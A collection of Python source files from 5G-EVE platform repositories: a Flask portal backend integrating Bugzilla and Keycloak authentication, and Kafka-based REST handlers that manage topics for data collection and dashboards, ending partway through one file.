"source": "5GEVE/5G-EVE-PORTAL-BACKEND-tsb",
"score": 2
} |
#### File: blueprints/auth/auth_bp.py
```python
from flask import ( Blueprint, jsonify, request )
from app import db, bcrypt, bz_client, kc_client
import requests
from app.models.user import *
from app.keycloak.keycloak_client import Keycloak
from app.bugzilla.bugzilla_client import BugzillaClient
# BLUEPRINT CREATION
bp = Blueprint('auth', __name__, url_prefix='')
# ROUTES DEFINITION
@bp.route('/register', methods=['POST'])
def registration():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Json not correctly formatted"}), 400
schema = BugzillaUserSchema()
errors = schema.validate(data)
if errors:
return jsonify({"details": errors}), 400
# check uniqueness of the username and email in local database
if not BugzillaUser.query.filter_by(email=data['email']).first() == None:
return jsonify({"details": "Username already registered"}), 400
# Create user in bugzilla
status, msg = bz_client.create_user(data)
if status in [200, 201]:
# Hash password
data['password'] = bcrypt.generate_password_hash(data['password'].encode('utf-8'))
# Store new user in local database
new_user = schema.load(data)
db.session.add(new_user)
db.session.commit()
return jsonify({'details': msg}), status
@bp.route('/login', methods=['POST'])
def login():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
if 'email' not in data.keys() or 'password' not in data.keys():
return jsonify({"details": "Email or password not provided"}), 400
status, msg = bz_client.login(data)
if status == requests.codes.ok:
user = BugzillaUser.query.filter_by(email=data['email']).first()
if user:
#TODO: Request user details and store bugzilla user id
#token_to_user_status, token_to_user_msg = kc_client.token_to_user(msg['token'])
#if token_to_user_status == requests.codes.ok:
#user.bz_user_id = token_to_user_msg['id']
user.apikey = msg['token']
db.session.commit()
return jsonify({"details": "User correctly logged in", "token": msg['token']}), 200
else:
schema = BugzillaUserSchema()
data['password'] = <PASSWORD>.generate_password_hash(data['password'].encode('utf-8'))
data['apikey'] = msg['token']
data['full_name'] = data['email']
# Store user in local database
new_user = schema.load(data)
db.session.add(new_user)
db.session.commit()
return jsonify({"details": "User correctly logged in", "token": msg['token']}), 200
print("[AUTH_BP][ERROR] > User correctly logged in at bugzilla but not found at local database")
return jsonify({"details": "Internal server error"}), 500
return jsonify({"details": msg}), status
@bp.route('/logout', methods=['GET'])
def logout():
token = str(request.headers['authorization']).split(" ")[1]
user_email = kc_client.get_user_email(token)
user = BugzillaUser.query.filter_by(email=user_email).first()
if user:
status, msg = bz_client.logout(user.apikey)
if status == requests.codes.ok:
user.apikey = ""
db.session.commit()
return jsonify({"details": "User session corretly closed"}), 200
return jsonify({"details": msg}), status
else:
print("[AUTH_BP][ERROR] > User correctly logged in at keycloak but not found at local database")
return jsonify({"details": "Internal server error"}), 500
'''
@bp.route('/changepassword', methods=['PUT'])
def change_password():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
try:
user_email = data['user_email']
new_password = data['<PASSWORD>']
except KeyError as error:
return jsonify({"details": "Parameter {} not provided".format(error)}), 400
status, msg = bz_client.change_password(user_email, new_password)
user = BugzillaUser.query.filter_by(email=user_email).first()
if user:
if status == requests.codes.ok:
user.password = <PASSWORD>(<PASSWORD>)
db.session.commit()
return jsonify({"details": "Password correctly updated"}), status
else:
return jsonify({"details": msg}), status
else:
data = {"email":user_email, "password": <PASSWORD>}
login_status, login_msg = bz_client.login(data)
if status == requests.codes.ok:
schema = BugzillaUserSchema()
data['password'] = <PASSWORD>(<PASSWORD>)
data['apikey'] = login_msg['token']
data['full_name'] = data['email']
# Store user in local database
new_user = schema.load(data)
db.session.add(new_user)
db.session.commit()
return jsonify({"details": ""}), 204
else:
print("[AUTH_BP][ERROR] > User correctly logged in at keycloak but not found at local database")
return jsonify({"details": "Internal server error"}), 500
'''
```
#### File: app/bugzilla/bugzilla_bugs.py
```python
import requests, json
from datetime import datetime
import numpy as np
class BugzillaBug:
def __init__(self, bugzilla_data):
self.bugzilla_data = bugzilla_data
""" Method to get a specific bug. The requested bug is only provided if:
- requester has admin role, we wil reply with all the tickets
- requester is not admin but is requesting 5G-EVE_PORTAL tickets (which are public)
@params:
- requester: email address of the user who is requesting data
- bug_id: bug identifier
@return:
- HTTP code: 200, 401 UNAUTHORIZED
- message: it will include a bug or details about the error
"""
def get_bugs_by_id(self, requester, requester_token, bug_id, is_admin):
if is_admin:
url = self.bugzilla_data['bugs_uri'] + '/' + bug_id + "?api_key=" + self.bugzilla_data['admin_key']
else:
url = self.bugzilla_data['bugs_uri'] + '/' + bug_id + "?token=" + requester_token
response = requests.get(url)
if response.status_code == requests.codes.ok:
data = response.json()
if is_admin:
return response.status_code, data
if len(data['bugs']) > 0:
if data['bugs'][0]['product'] == "5G-EVE_PORTAL":
return response.status_code, data
else:
return requests.codes.unauthorized, json.loads('{"details": "User unauthorized for retrieving ticket"}')
else:
return requests.status_codes, json.loads(json.dumps([]))
return response.status_code, response.json()
""" Method to collect bugs from bugzilla (all for admin and 5G-EVE_PORTAL related for regular users)
@params:
- requester: email address of the user requesting bugs
@return:
- HTTP code
- message: it will include a bug list or details about the error
"""
def get_bugs_by_creator(self, requester, requester_token, is_admin, page):
if page == None:
page = 1
if is_admin:
url = self.bugzilla_data['bugs_uri'] + "?api_key=" + self.bugzilla_data['admin_key'] + "&status=CONFIRMED"
else:
#url = self.bugzilla_data['bugs_uri'] + "?reporter=" + requester + "&token=" + requester_token + "&status=CONFIRMED"
url = self.bugzilla_data['bugs_uri'] + "?api_key=" + self.bugzilla_data['admin_key'] + "&status=CONFIRMED&product=5G-EVE_PORTAL"
response = requests.get(url)
if response.status_code == 200:
sorted_bugs = sorted(response.json()['bugs'], key=lambda k: datetime.strptime(k['creation_time'],'%Y-%m-%dT%H:%M:%SZ'), reverse=True)
if not is_admin:
non_admin_bugs = []
for b in sorted_bugs:
if b['component'] == "VNF_UPLOADS" and b['creator_detail']['email'] == requester:
non_admin_bugs.append(b)
elif b['component'] not in ["REGISTRATION", "VNF_UPLOADS", "AUTHENTICATION"]:
non_admin_bugs.append(b)
sorted_bugs = non_admin_bugs
if int(page) > np.ceil(len(sorted_bugs)/10):
return 404, "Tickets page not found"
bugs = []
start = (page*10)
end = (page*10) + 10
if end > len(sorted_bugs):
end = len(sorted_bugs)
for i in range(start, end):
bugs.append(sorted_bugs[i])
data = {}
data['tickets'] = bugs
data['totalTickets'] = len(sorted_bugs)
data['numTickets'] = len(bugs)
return response.status_code, data
return response.status_code, response.content
""" Method to create a bug
@params:
- reporter_token: user token
- bug_data: data provided to create a bug
- product: Name of the product where the bug is being created
- component: Name of the component inside the product where the bug is being created
- version: unspecified by default
- summary: summary of the bug
- description: description
- assigned_to: by default it will be the component owner
- reporter: email of the admin reporter in case it is a ticket creation from a trusted service
"""
def create_bug(self, reporter_token, bug_data, reporter):
if reporter_token != None:
url = self.bugzilla_data['bugs_uri'] + "?token=" + reporter_token
elif reporter_token == None and reporter != None and reporter == self.bugzilla_data['username']:
url = self.bugzilla_data['bugs_uri'] + "?api_key=" + self.bugzilla_data['admin_key']
#TODO: hardcoded values not defaulted at bugzilla
bug_data['version'] = "unspecified"
bug_data['op_sys'] = "other"
bug_data['platform'] = "pc"
response = requests.post(url, data=bug_data)
return response.status_code, response.json()
""" Method to update a specific bug
@params:
- reporter_token
- bug_data
- summary: new summary of the bug
- description: new description of the bug
- groups: group names to be added/removed
> "groups": {"add/remove": ["group1", "group2"]}
- assigned_to: email of the user to assign the bug
- status: new status of the bug. When changing to closed, resolution should be provided
- bug_id
- is_admin
@return:
status: HTTP code
msg: information returned from bugzilla REST API
"""
def update_bug(self, reporter, reporter_token, bug_data, bug_id, is_admin):
if is_admin:
url = self.bugzilla_data['bugs_uri'] + "/" + bug_id + "?token=" + reporter_token
response = requests.put(url, data=bug_data)
else:
code, msg = self.get_bugs_by_id(requester=reporter, requester_token=reporter_token, bug_id=bug_id, is_admin=False)
if code == requests.codes.ok:
url = self.bugzilla_data['bugs_uri'] + "/" + bug_id + "?token=" + reporter_token
response = requests.put(url, data=bug_data)
else:
return 401, json.loads(json.dumps({"error": "User not allowed to update bug #{}".format(bug_id)}))
return response.status_code, response.json()
```
#### File: app/bugzilla/bugzilla_client.py
```python
import requests, os, json, functools
from flask import jsonify
from .bugzilla_products import BugzillaProducts
from .bugzilla_components import BugzillaComponent
from .bugzilla_bugs import BugzillaBug
from .bugzilla_comments import BugzillaComment
class BugzillaClient:
def __init__(self):
with open(os.path.abspath(os.path.dirname(__file__))+'/bugzilla_data.json') as config:
self.bugzilla_data = json.load(config)
self.products = BugzillaProducts(self.bugzilla_data)
self.components = BugzillaComponent(self.bugzilla_data)
self.bugs = BugzillaBug(self.bugzilla_data)
self.bug_comments = BugzillaComment(self.bugzilla_data)
def trusted_requester(self, requester):
if requester == self.bugzilla_data['username']:
return True
else:
return False
""" Method to create new users at bugzilla
@params:
- email
- full_name
- password
@return: HTTP code + details message
"""
def create_user(self, user_data):
url = self.bugzilla_data['users_uri'] + "?api_key=" + self.bugzilla_data['admin_key']
response = requests.post(url, data=user_data)
return response.status_code, response.json()
""" Login method
@params: email + password
@return:
- HTTP code
- Details message: if success, it will include an access token that belongs to the authenticated user
"""
def login(self, user_data):
#url = self.bugzilla_data['login_uri'] + "?login=" + user_data['email'] + '&password="{}"'.format(user_data['password'])
url = self.bugzilla_data['login_uri']
params = {'login': user_data['email'], 'password': user_data['password']}
response = requests.get(url, params=params)
if response.status_code != 200:
return response.status_code, "User not found"
return response.status_code, response.json()
""" Logout method
@params: user session token
@return: HTTP code + details message
"""
def logout(self, token):
url = self.bugzilla_data['logout_uri'] + "?token='*'" + token
response = requests.get(url)
return response.status_code, response.json()
def get_admin_users(self):
url = self.bugzilla_data['users_uri'] + "?api_key=" + self.bugzilla_data['admin_key'] + '&match=*@*'
response = requests.get(url)
if response.status_code != requests.codes.ok:
return response.status_code, response.json()
else:
data = response.json()
admin_users = []
for user in data['users']:
for group in user['groups']:
if group['name'] == 'admin':
admin_users.append(user['email'])
break
return response.status_code, json.loads(json.dumps({'users': admin_users}))
def change_password(self, user_email, new_password):
url = self.bugzilla_data['users_uri'] + "/"+ user_email + "?api_key=" + self.bugzilla_data['admin_key']
new_user_data = {
"password": <PASSWORD>
}
response = requests.put(url, data=new_user_data)
return response.status_code, response.json()
#### PRODUCTS MANAGEMENT ####
def get_products(self):
return self.products.get_products()
#### COMPONENTS MANAGEMENT ####
def get_components(self, product_id, detailed):
if detailed:
return self.components.get_components_all_details(product_id)
else:
return self.components.get_components(product_id)
#### BUGS MANAGEMENT ####
def get_bug(self, requester_email, requester_token, bug_id, is_admin):
return self.bugs.get_bugs_by_id(requester_email, requester_token, bug_id, is_admin)
def get_bugs(self, requester_email, requester_token, is_admin, page):
return self.bugs.get_bugs_by_creator(requester_email, requester_token, is_admin, page)
def create_bug(self, reporter_token, bug_data, reporter):
return self.bugs.create_bug(reporter_token, bug_data, reporter)
def update_bug(self, reporter_email, reporter_token, bug_data, bug_id, is_admin):
return self.bugs.update_bug(reporter_email, reporter_token, bug_data, bug_id, is_admin)
def get_bug_comments(self, requester_token, bug_id, is_admin):
return self.bug_comments.get_comments(requester_token, bug_id, is_admin)
def create_bug_comment(self, user_token, bug_id, comment_data, is_admin):
return self.bug_comments.create_comment(user_token, bug_id, comment_data, is_admin)
```
#### File: app/bugzilla/bugzilla_components.py
```python
import requests, json
class BugzillaComponent:
def __init__(self, bugzilla_data):
self.bugzilla_data = bugzilla_data
""" Retrieve all components of a product
@params:
- product_id: product identifier
"""
def get_components(self, product_id):
# Get product who stores the components
response = requests.get(self.bugzilla_data['products_uri'] + '/' + str(product_id))
if response.status_code == requests.codes.ok:
data = response.json()
if len(data['products']) > 0:
components = []
for component in data['products'][0]['components']:
if component['name'] not in ["REGISTRATION", "AUTHENTICATION"]:
component = {'id': component['id'], 'name': component['name'], 'description': component['description']}
components.append(component)
return response.status_code, json.loads(json.dumps(components))
else:
return response.status_code, json.loads(json.dumps([]))
return response.status_code, response.json()
""" Retrieve all components of a product
@params:
- product_id: product identifier
"""
def get_components_all_details(self, product_id):
# Get product who stores the components
response = requests.get(self.bugzilla_data['products_uri'] + '/' + str(product_id))
if response.status_code == requests.codes.ok:
data = response.json()
if len(data['products']) > 0:
print(data)
return response.status_code, data['products'][0]['components']
else:
return response.status_code, json.loads(json.dumps([]))
return response.status_code, response.json()
```
#### File: app/tests/test_flaskr.py
```python
import os
import tempfile
import requests
api_url = "http://127.0.0.1:8989"
def test_no_token():
"""Request home without token"""
response = requests.get(api_url+"/isvalid")
print(response.status_code)
assert response.status_code == 401
``` |
{
"source": "5GEVE/5geve-wp3-dcm-handler",
"score": 2
} |
#### File: 5GEVE/5geve-wp3-dcm-handler/dcm_rest_client.py
```python
import requests
import argparse
import logging
import coloredlogs
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
from kafka import KafkaProducer
from kafka.errors import KafkaError
from kafka.future import log
import json
app = Flask(__name__)
logger = logging.getLogger("DCMRestClient")
kafka_port = "9092"
signalling_metric_infrastructure = "signalling.metric.infrastructure"
signalling_metric_application = "signalling.metric.application"
signalling_kpi = "signalling.kpi"
"""
The creation of MirrorMaker processes has been moved to dedicated systemd services.
This allows to check logs more easily, setup restart on failure.
We leave this code for future reference.
"""
# Start one MirrorMaker per each site, blacklisting signalling and)
# def start_mirror(site):
# """
# Opens a mirrormaker with a site in order to mirror metric topics.
# Signalling and KPI topics are blacklisted with regex.
# """
# print("Start MirrorMaker for " + site);
# subprocess.Popen(
# [
# "/bin/bash",
# "/opt/kafka/bin/kafka-run-class.sh",
# "kafka.tools.MirrorMaker",
# "--consumer.config",
# "/usr/bin/dcm/" + site + "_consumer.config",
# "--num.streams",
# "2",
# "--producer.config",
# "/usr/bin/dcm/producer.config",
# "--whitelist",
# "'^.*\.application_metric\..*$,^.*\.infrastructure_metric\..*$'",
# ],
# stdout=subprocess.PIPE,
# stderr=subprocess.STDOUT,
# )
# start_mirror("spanish")
# start_mirror("italian")
# start_mirror("french")
# start_mirror("greek")
@app.route('/', methods=['GET'])
def server_status():
"""
Get status.
---
describe: get status
responses:
200:
description: OK
"""
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
"""
Get swagger specification.
---
describe: get swagger specification
responses:
swagger:
description: swagger specification
"""
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "DCM REST API"
return jsonify(swag)
def create_kafka_topic(topic):
logger.info("Creating topic %s in Kafka", topic)
# TODO (if needed). 2 partitions minimum without key
if "signalling." in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
elif ".kpi." in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
elif ".spain_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Spanish site", topic)
r = requests.post(spanish_site_url + topic)
logger.info("Response from Spanish site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in Spanish site", topic)
elif ".italy_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Italian site", topic)
r = requests.post(italian_site_url + topic)
logger.info("Response from Italian site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in Italian site", topic)
elif ".france_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to French site", topic)
r = requests.post(french_site_url + topic)
logger.info("Response from French site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in French site", topic)
elif ".greece_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Greek site", topic)
r = requests.post(greek_site_url + topic)
logger.info("Response from Greek site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in Greek site", topic)
else:
raise Exception("The topic %s has a bad format", topic)
@app.route('/dcm/subscribe', methods=['POST'])
def subscribe():
"""
Subscribe to signalling topic.
---
describe: subscribe to signalling topic
parameters:
- in: body
name: signalling_topic_data
schema:
id: signalling_topic_data
properties:
expId:
type: string
description: expId set to 'internal'
topic:
type: string
description: signalling topic name
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - POST /dcm/subscribe")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
# TODO (if needed). Check client-id and group-id. Group-id should ensure an unique consumer. If we have severeal consumers in a group, data can be shared and we don't want it.
data = request.get_json()
logger.info("Data received: %s", data)
create_kafka_topic(data["topic"])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def delete_kafka_topic(topic):
# Do not forget to set delete.topic.enable=true in config/server.properties.
if "signalling." in topic:
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif ".kpi." in topic:
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif ".spain_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Spanish site", topic)
r = requests.delete(spanish_site_url + topic)
logger.info("Response from Spanish site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in Spanish site", topic)
elif ".italy_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Italian site", topic)
r = requests.delete(italian_site_url + topic)
logger.info("Response from Italian site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in Italian site", topic)
elif ".france_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to French site", topic)
r = requests.delete(french_site_url + topic)
logger.info("Response from French site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in French site", topic)
elif ".greece_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Greek site", topic)
r = requests.delete(greek_site_url + topic)
logger.info("Response from Greek site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in Greek site", topic)
else:
raise Exception("The topic %s has a bad format", topic)
@app.route('/dcm/unsubscribe', methods=['DELETE'])
def unsubscribe():
"""
Unsubscribe to signalling topic.
---
describe: unsubscribe to signalling topic
parameters:
- in: body
name: signalling_topic_data
schema:
id: signalling_topic_data
properties:
expId:
type: string
description: expId set to 'internal'
topic:
type: string
description: signalling topic name
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - DELETE /dcm/unsubscribe")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
data = request.get_json()
logger.info("Data received: %s", data)
delete_kafka_topic(data["topic"])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def publish_in_kafka(topic, data):
logger.info("Publish data in Kafka topic %s", topic)
# TODO (if needed). Key? No, do RR between partitions. If I use the same key, it uses the same partition.
futures = producer.send(topic=topic, value=json.dumps(data))
response = futures.get()
logger.info("Response from Kafka: %s", response)
@app.route('/dcm/publish/<topic>', methods=['POST'])
def publish(topic):
"""
Publish data in a topic.
---
describe: publish data in a topic
definitions:
- schema:
id: record
properties:
value:
description: value included in the records list
schema:
id: value
properties:
topic:
type: string
description: topic name
expId:
type: string
description: experiment ID
action:
type: string
description: either subscribe or unsubscribe
context:
description: additional information
schema:
id: context
properties:
metricId:
type: string
description: metric ID (if topic is related to a metric)
kpiId:
type: string
description: KPI ID (if topic is related to a KPI)
metricCollectionType:
type: string
description: metric collection type (if topic is related to a metric)
graph:
type: string
description: graph type (LIE, PIE, GAUGE)
name:
type: string
description: metric name
unit:
type: string
description: metric unit
interval:
type: string
description: time interval to capture the metric
parameters:
- in: path
name: topic
type: string
description: topic name
- in: body
name: records
type: array
description: records sent in the message
items:
$ref: "#/definitions/record"
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - POST /dcm/publish/%s", topic)
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
logger.info("Data received in topic %s", topic)
data = request.get_json()
if "signalling" in topic:
# Data received from a signalling topic, whose data model is well-known.
records = data["records"]
logger.info("Records raw list: %s", records)
for value in records:
if value["value"]["topic"].count('.') != 4 or value["value"]["topic"].count(' ') != 0 or value["value"]["topic"].count(',') != 0:
raise Exception("Incorrect format in topic name: %s", value["value"]["topic"])
else:
logger.info("Value received: topic %s - expId %s - action %s - context %s", value["value"]["topic"], value["value"]["expId"], value["value"]["action"], value["value"]["context"])
if value["value"]["action"] == "subscribe":
kafka_topic = value["value"]["topic"]
if subprocess.check_output(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--list', '--zookeeper', dcm_ip_address+":2181"]).decode("utf-8").find(kafka_topic) == -1:
# Subscribe operation: create the Kafka topic.
# Notify subscribers from the corresponding signalling topic.
if "application" in topic and ".application_metric." in kafka_topic:
create_kafka_topic(kafka_topic)
publish_in_kafka(signalling_metric_application, value["value"])
elif "infrastructure" in topic and ".infrastructure_metric." in kafka_topic:
create_kafka_topic(kafka_topic)
publish_in_kafka(signalling_metric_infrastructure, value["value"])
elif "kpi" in topic and ".kpi." in kafka_topic:
create_kafka_topic(kafka_topic)
publish_in_kafka(signalling_kpi, value["value"])
else:
logger.warning("No data sent to Kafka")
else:
logger.warning("The topic %s already exists in Kafka", kafka_topic)
else:
kafka_topic = value["value"]["topic"]
if subprocess.check_output(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--list', '--zookeeper', dcm_ip_address+":2181"]).decode("utf-8").find(kafka_topic) != -1:
# Notify subscribers from the corresponding signalling topic.
# Unsubscribe operation: delete the Kafka topic.
if "application" in topic and ".application_metric." in kafka_topic:
publish_in_kafka(signalling_metric_application, value["value"])
delete_kafka_topic(kafka_topic)
elif "infrastructure" in topic and ".infrastructure_metric." in kafka_topic:
publish_in_kafka(signalling_metric_infrastructure, value["value"])
delete_kafka_topic(kafka_topic)
elif "kpi" in topic and ".kpi." in kafka_topic:
publish_in_kafka(signalling_kpi, value["value"])
delete_kafka_topic(kafka_topic)
else:
logger.warning("No data sent to Kafka")
else:
logger.warning("The topic %s does not exist in Kafka", kafka_topic)
else:
# Data received from another component (e.g. Data Shipper using the REST API). Just publish the JSON chain received.
# In this case, it is supposed that topic has been already created in Kafka beforehand.
# TODO (if needed). Review this publish operation.
publish_in_kafka(topic, data)
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def checkValidPort(value):
ivalue = int(value)
# RFC 793
if ivalue < 0 or ivalue > 65535:
raise argparse.ArgumentTypeError("%s is not a valid port" % value)
return value
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dcm_ip_address",
help='DCM IP address, default IP is localhost',
default='localhost')
parser.add_argument(
"--port",
type=checkValidPort,
help='The port you want to use as an endpoint, default port is 8090',
default="8090")
parser.add_argument(
"--spanish_site_plugin_ip_port",
help='Spanish Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--italian_site_plugin_ip_port",
help='Italian Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--french_site_plugin_ip_port",
help='French Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--greek_site_plugin_ip_port",
help='Greek Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % loglevel)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("DCMRestClient").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
args = parser.parse_args()
global dcm_ip_address
dcm_ip_address= str(args.dcm_ip_address)
global producer
producer = KafkaProducer(bootstrap_servers = dcm_ip_address + ":" + kafka_port, value_serializer=lambda x: json.dumps(x).encode('utf-8'))
global spanish_site_url
spanish_site_url = "http://" + str(args.spanish_site_plugin_ip_port) + "/dcm_plugin/"
global italian_site_url
italian_site_url = "http://" + str(args.italian_site_plugin_ip_port) + "/dcm_plugin/"
global french_site_url
french_site_url = "http://" + str(args.french_site_plugin_ip_port) + "/dcm_plugin/"
global greek_site_url
greek_site_url = "http://" + str(args.greek_site_plugin_ip_port) + "/dcm_plugin/"
logger.info("Serving DCMRestClient on port %s", str(args.port))
serve(app, host='0.0.0.0', port=args.port)
``` |
{
"source": "5GEVE/5geve-wp4-dcs-signalling-topic-handler",
"score": 2
} |
#### File: 5GEVE/5geve-wp4-dcs-signalling-topic-handler/dcs_rest_client.py
```python
import requests
import argparse
import logging
import coloredlogs
import threading
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
import json
from kafka import KafkaConsumer
from threading import Thread
from threading import Timer
from datetime import timedelta
import psycopg2
import time
app = Flask(__name__)
logger = logging.getLogger("DCSRestClient")
signalling_metric_infrastructure = {'expId': 'internal', 'topic': 'signalling.metric.infrastructure'}
signalling_metric_application = {'expId': 'internal', 'topic': 'signalling.metric.application'}
signalling_kpi = {'expId': 'internal', 'topic': 'signalling.kpi'}
dcm_port = "8090"
dcm_subscribe_url = "/dcm/subscribe"
dcm_unsubscribe_url = "/dcm/unsubscribe"
dcs_dashboard_url = "http://127.0.0.1:8080/portal/dcs/dashboard"
signalling_start = False
@app.route('/', methods=['GET'])
def server_status():
"""
Get status.
---
describe: get status
responses:
200:
description: OK
"""
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
"""
Get swagger specification.
---
describe: get swagger specification
responses:
swagger:
description: swagger specification
"""
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "DCS REST API"
return jsonify(swag)
def kafka_consumer_refresh_dashboard_handler(topic, value):
logger.info("Creating Kafka Consumer for %s topic", topic)
consumer = KafkaConsumer(
topic,
bootstrap_servers=[dcm_ip_address + ":9092"],
auto_offset_reset='earliest',
enable_auto_commit=True,
group_id=None,
value_deserializer=lambda x: json.loads(x.decode('utf-8')))
message_received = False
while not message_received:
message = consumer.poll(timeout_ms=1000)
if message != {}:
logger.info("Message received in %s topic: %s", topic, message)
message_received = True
time.sleep(5)
logger.info("Creating dashboard for topic: %s", topic)
r = requests.post(dcs_dashboard_url, json={'records': [ { 'value': json.loads(value) }]})
logger.info("Response: Code %s", r)
# This call seems that is not needed as the dashboard is generated when data is present.
#time.sleep(2)
#logger.info("Refreshing dashboard for %s topic", topic)
#subprocess.call(['/bin/bash', '/usr/bin/dcs/refresh_dashboard.sh', topic])
logger.info("Closing Kafka Consumer for %s topic", topic)
consumer.close()
def index_cleaner(topic, value):
logger.info("Time to delete the dashboard for topic %s", topic)
r = requests.delete(dcs_dashboard_url, json={'records': [ { 'value': json.loads(value) }]})
logger.info("Response: Code %s", r)
logger.info("Time to delete the Elasticsearch index for topic %s", topic)
subprocess.call(['/bin/bash', '/usr/bin/dcs/delete_logstash_pipeline.sh', topic, 'yes'])
def kafka_consumer_signalling_topic_handler(signalling_topic_data):
logger.info("Creating Kafka Consumer for %s topic", signalling_topic_data["topic"])
consumer = KafkaConsumer(
signalling_topic_data["topic"],
bootstrap_servers=[dcm_ip_address + ":9092"],
auto_offset_reset='earliest',
enable_auto_commit=True,
group_id=None,
value_deserializer=lambda x: json.loads(x.decode('utf-8')))
while signalling_start:
message = consumer.poll(timeout_ms=1000)
if message != {}:
logger.info("Message received in %s topic: %s", signalling_topic_data["topic"], message)
for tp, messages in message.items():
for msg in messages:
logger.info("Value: %s", msg.value)
topic = json.loads(msg.value)["topic"]
if json.loads(msg.value)["action"] == "subscribe":
logger.info("Create Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', '/usr/bin/dcs/create_logstash_pipeline.sh', topic])
